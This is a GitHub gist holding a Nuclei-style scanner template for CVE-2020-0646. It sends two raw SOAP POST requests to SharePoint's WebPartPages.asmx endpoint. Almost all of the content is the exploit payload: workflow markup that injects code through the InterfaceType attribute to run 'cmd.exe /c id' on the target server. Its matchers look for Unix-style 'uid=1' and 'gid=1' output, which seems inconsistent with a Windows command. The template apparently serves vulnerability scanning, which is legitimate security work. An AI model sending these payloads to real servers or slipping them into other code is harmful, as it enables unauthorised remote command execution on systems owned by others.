Created
January 5, 2021 12:51
-
-
Save 0x240x23elu/5e57fea55433c6378956f7e28b54fc2c to your computer and use it in GitHub Desktop.
CVE-2020-0646
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
info: | |
name: CVE-2020-0646 | |
author: 0x240x23elu | |
severity: High | |
requests: | |
- raw: | |
- | | |
POST /EN/_vti_bin/WebPartPages.asmx HTTP/1.1 | |
Host: {{Hostname}} | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Cookie: PERSISTENCE-COOKIE=2290634762.20480.0000 | |
Accept-Language: en-us, en;q=0.1 | |
Accept: auth/sicily | |
X-FORMS_BASED_AUTH_ACCEPTED: T | |
Content-Type: text/xml; charset=utf-8 | |
X-Vermeer-Content-Type: text/xml; charset=utf-8 | |
Accept-encoding: gzip, deflate | |
Connection: Keep-Alive | |
Pragma: no-cache | |
Content-Length: 947 | |
<?xml version="1.0" encoding="utf-8"?> | |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages"><workflowMarkupText><![CDATA[ | |
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" | |
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"> | |
<CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe","/c id";private/**/void/**/foobar(){//' /> | |
</SequentialWorkflowActivity> | |
]]></workflowMarkupText><rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope> | |
- | | |
POST /_vti_bin/WebPartPages.asmx HTTP/1.1 | |
Host: {{Hostname}} | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Cookie: PERSISTENCE-COOKIE=2290634762.20480.0000 | |
Accept-Language: en-us, en;q=0.1 | |
Accept: auth/sicily | |
X-FORMS_BASED_AUTH_ACCEPTED: T | |
Content-Type: text/xml; charset=utf-8 | |
X-Vermeer-Content-Type: text/xml; charset=utf-8 | |
Accept-encoding: gzip, deflate | |
Connection: Keep-Alive | |
Pragma: no-cache | |
Content-Length: 947 | |
<?xml version="1.0" encoding="utf-8"?> | |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages"><workflowMarkupText><![CDATA[ | |
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" | |
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"> | |
<CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe","/c id";private/**/void/**/foobar(){//' /> | |
</SequentialWorkflowActivity> | |
]]></workflowMarkupText><rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope> | |
matchers-condition: and | |
matchers: | |
- type: status | |
status: | |
- 200 | |
- type: word | |
words: | |
- "uid=1" | |
- "gid=1" | |
condition: and | |
part: body |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment